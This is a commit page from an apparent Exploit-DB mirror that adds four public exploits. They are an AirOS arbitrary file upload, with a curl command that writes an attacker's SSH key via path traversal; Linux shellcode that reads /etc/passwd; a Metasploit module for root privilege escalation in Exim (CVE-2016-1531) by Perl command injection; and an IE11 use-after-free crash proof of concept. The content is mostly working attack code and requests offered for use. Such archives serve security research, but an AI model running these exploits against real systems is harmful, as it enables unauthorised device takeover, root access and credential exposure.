bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-04-16

Browse source 
4 new exploits

Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free
Linux/x86_64 - Read /etc/passwd - 65 bytes
AirOS 6.x - Arbitrary File Upload
Exim _perl_startup_ Privilege Escalation
This commit is contained in:
Offensive Security 2016-04-16 05:02:22 +00:00
parent b185ddf9b2
commit 99627c8d04
5 changed files with 280 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
files.csv
View file

@ -35917,3 +35917,7 @@ id,file,description,date,author,platform,type,port
39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80
39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80
39698,platforms/windows/remote/39698.html,"Internet Explorer 9_ 10_ 11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0
39699,platforms/windows/dos/39699.html,"Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use After Free",2016-04-15,"Marcin Ressel",windows,dos,0
39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0

Can't render this file because it is too large.

37
platforms/cgi/webapps/39701.txt Executable file
View file

@ -0,0 +1,37 @@
EDB-Note Source: https://hackerone.com/reports/73480
Vulnerability
It's possible to overwrite any file (and create new ones) on AirMax systems, because the "php2" (maybe because of a patch) don't verify the "filename" value of a POST request. It's possible to a unauthenticated user to exploit this vulnerability.
Example
Consider the following request:
POST https://192.168.1.20/login.cgi HTTP/1.1
Cookie: $Version=0; AIROS_SESSIONID=9192de9ba81691e3e4d869a7207ec80f; $Path=/; ui_language=en_US
Content-Type: multipart/form-data; boundary=---------------------------72971515916103336881230390860
Content-Length: 773
User-Agent: Jakarta Commons-HttpClient/3.1
Host: 192.168.1.20
Cookie: $Version=0; AIROS_SESSIONID=7597f7f30cec75e1faef8fb608fc43bb; $Path=/; ui_language=en_US
-----------------------------72971515916103336881230390860
Content-Disposition: form-data; name="keyfile"; filename="../../etc/dropbear/authorized_keys"
Content-Type: application/vnd.ms-publisher
{{Your Public Key HERE}}
-----------------------------72971515916103336881230390860--
The web server must filter the file name ../../etc/dropbear/authorized_keys to just authorized_keys or return a 404. But the AirMax just received the file, overwriting the original (creating if don't exist) in the process. In this case the attacker are uploading arbitrary public ssh keys, but it can be used to upload configurations, or "/etc/passwd"...
Consequences
It's possible to take control over any AirMax Product with simple forged http POST request, what it disastrous.
Reproducing
With a simple command:
curl -F "file=@.ssh/id_rsa.pub;filename=../../etc/dropbear/authorized_keys" -H "Expect:" 'https://192.168.1.20/login.cgi' -k
Of course if the ssh is disabled you can overwrite /etc/passwd and/or /tmp/system.cfg.

66
platforms/lin_x86-64/shellcode/39700.c Executable file
View file

@ -0,0 +1,66 @@
/*
---------------------------------------------------------------------------------------------------
Linux/x86_64 - Read /etc/passwd - 65 bytes
Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ]
Om Asato Maa Sad-Gamaya |
Tamaso Maa Jyotir-Gamaya |
Mrtyor-Maa Amrtam Gamaya |
Om Shaantih Shaantih Shaantih |
---------------------------------------------------------------------------------------------------
Disassembly of section .text:
Disassembly of section .text:
0000000000400080 <.text>:
400080: eb 2f jmp 0x4000b1
400082: 5f pop rdi
400083: 6a 02 push 0x2
400085: 58 pop rax
400086: 48 31 f6 xor rsi,rsi
400089: 0f 05 syscall
40008b: 66 81 ec ef 0f sub sp,0xfef
400090: 48 8d 34 24 lea rsi,[rsp]
400094: 48 97 xchg rdi,rax
400096: 48 31 d2 xor rdx,rdx
400099: 66 ba ef 0f mov dx,0xfef
40009d: 48 31 c0 xor rax,rax
4000a0: 0f 05 syscall
4000a2: 6a 01 push 0x1
4000a4: 5f pop rdi
4000a5: 48 92 xchg rdx,rax
4000a7: 6a 01 push 0x1
4000a9: 58 pop rax
4000aa: 0f 05 syscall
4000ac: 6a 3c push 0x3c
4000ae: 58 pop rax
4000af: 0f 05 syscall
4000b1: e8 cc ff ff ff call 0x400082
4000b6: 2f (bad)
4000b7: 65 74 63 gs je 0x40011d
4000ba: 2f (bad)
4000bb: 70 61 jo 0x40011e
4000bd: 73 73 jae 0x400132
4000bf: 77 64 ja 0x400125
---------------------------------------------------------------------------------------------------
How To Run
$ gcc -o read_passwd read_passwd.c
$ execstack -s read_passwd
$ ./read_passwd
---------------------------------------------------------------------------------------------------
*/
#include <stdio.h>
char sh[]="\xeb\x2f\x5f\x6a\x02\x58\x48\x31\xf6\x0f\x05\x66\x81\xec\xef\x0f\x48\x8d\x34\x24\x48\x97\x48\x31\xd2\x66\xba\xef\x0f\x48\x31\xc0\x0f\x05\x6a\x01\x5f\x48\x92\x6a\x01\x58\x0f\x05\x6a\x3c\x58\x0f\x05\xe8\xcc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}

59
platforms/linux/local/39702.rb Executable file
View file

@ -0,0 +1,59 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Exim "perl_startup" Privilege Escalation',
'Description' => %q{
This module exploits a Perl injection vulnerability in Exim < 4.86.2
given the presence of the "perl_startup" configuration parameter.
},
'Author' => [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-1531},
%w{EDB 39549},
%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
],
'DisclosureDate' => 'Mar 10 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'BadChars' => "\x22\x27", # " and '
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
}
},
'Targets' => [
['Exim < 4.86.2', {}]
],
'DefaultTarget' => 0
))
end
def check
if exploit('whoami') == 'root'
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
def exploit(c = payload.encoded)
# PERL5DB technique from http://perldoc.perl.org/perlrun.html
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
end
end

114
platforms/windows/dos/39699.html Executable file
View file

@ -0,0 +1,114 @@
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="refresh" content="1"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:white;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
* Title: MSHTML!CMarkupPointer::UnEmbed Use After Free
* Author: Marcin Ressel @ressel_m
* Date: 15.04.2016
* Vendor Homepage: www.microsoft.com
* Software Link: n/a
* Version: IE11 (latest)
* Tested on: Windows 10 x64 && Windows 7 x64
* --------------------------------------------------
* IE 11 MSHTML!CMarkupPointer::UnEmbed Use After Free
* IE 11.0.9600.18230 (win7)
* Windows 7 x64, Windows 10 x64 (11.162.10586.0)
* 11.04.2016
*
0:019> g
(490.1194): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0df7bbd0 ecx=126e4f38 edx=00000000 esi=12750fd0 edi=00000000
eip=67028aa8 esp=0a97a658 ebp=0a97a7bc iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212
MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xdb:
67028aa8 8b7610 mov esi,dword ptr [esi+10h] ds:002b:12750fe0=????????
0:007> !heap -p -a esi
address 12750fd0 found in
_DPH_HEAP_ROOT @ ad81000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
ffe3410: 12750000 2000
747790b2 verifier!AVrfDebugPageHeapFree+0x000000c2
77a5251c ntdll!RtlDebugFreeHeap+0x0000002f
77a0b2a2 ntdll!RtlpFreeHeap+0x0000005d
779b2ce5 ntdll!RtlFreeHeap+0x00000142
74a4adeb vrfcore!VerifierSetAPIClassName+0x0000017b
769d14bd kernel32!HeapFree+0x00000014
67011a67 MSHTML!MemoryProtection::HeapFree+0x00000046
66b08fff MSHTML!CMarkupPointer::UnEmbed+0x000000bd
66d75a96 MSHTML!CMarkupPointer::MoveToGap+0x00000094
67006183 MSHTML!CMarkupPointer::FindTextIdentity+0x000002b7
66d75a22 MSHTML!CDOMTextNode::GetParentNodeHelper+0x0000004b
6719351c MSHTML!CDOMNode::AppendTransientRegisteredObservers+0x00000035
66f192f7 MSHTML!CSpliceTreeEngine::HandleRemovalMutations+0xffef092a
66b47967 MSHTML!CSpliceTreeEngine::RemoveSplice+0x000051ef
66b49c9f MSHTML!CMarkup::SpliceTreeInternal+0x000000a8
66d8dc9b MSHTML!CDoc::CutCopyMove+0x00000d93
66b49a27 MSHTML!RemoveWithBreakOnEmpty+0x00000097
66b3400d MSHTML!CElement::InjectInternal+0x0000043f
66dd76d5 MSHTML!CElement::InjectTextOrHTML+0x00000323
66a857e8 MSHTML!CElement::Var_set_innerText+0x00000050
66a8576c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_innerText+0x0000003c
7330c572 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000182
7330d075 jscript9!<lambda_73b9149c3f1de98aaab9368b6ff2ae9d>::operator()+0x0000009d
7330cfb2 jscript9!Js::JavascriptOperators::CallSetter+0x00000076
7333fdcc jscript9!Js::JavascriptOperators::SetProperty_Internal<0>+0x00000341
7333fb83 jscript9!Js::JavascriptOperators::OP_SetProperty+0x00000040
7333fc03 jscript9!Js::JavascriptOperators::PatchPutValueNoFastPath+0x0000004d
73308800 jscript9!Js::InterpreterStackFrame::Process+0x00002c1e
7330bd59 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000200
*/
function testcase()
{
var elements = [];
var eFrame = document.getElementById("e1");
var tmp = eFrame.contentWindow.document.createElement("body");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("cite");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("frame");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("ellipse");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("html");
elements.push(tmp);
tmp = eFrame.contentWindow.document.createElement("command");
elements.push(tmp);
var trg = document;
trg.body.appendChild(elements[0]);
trg.body.appendChild(elements[1]);
trg.body.appendChild(elements[2]);
trg.body.appendChild(elements[3]);
trg.body.appendChild(elements[4]);
trg.body.appendChild(elements[5]);
dom = document.getElementsByTagName("*");
doc = document;
trg = dom[10];
var observer = new MutationObserver(new Function("",""));
observer.observe(trg,{ attributes: true, childList: true, characterData: true, subtree: true});
trg.insertAdjacentHTML("afterBegin","<tbody><ol><script><polygon><circle><table></table><command><table></table><rp>");
trg.innerText = '12345';
}
</script>
<title>IE 11.0.9600.18230 MSHTML!CMarkupPointer::UnEmbed UAF POC</title>
</head>
<body onload='testcase();'>
<iframe id='t1'></iframe><iframe id='e1'></iframe>
<div id='oneUnArg'>||||</div>
</body>
</html>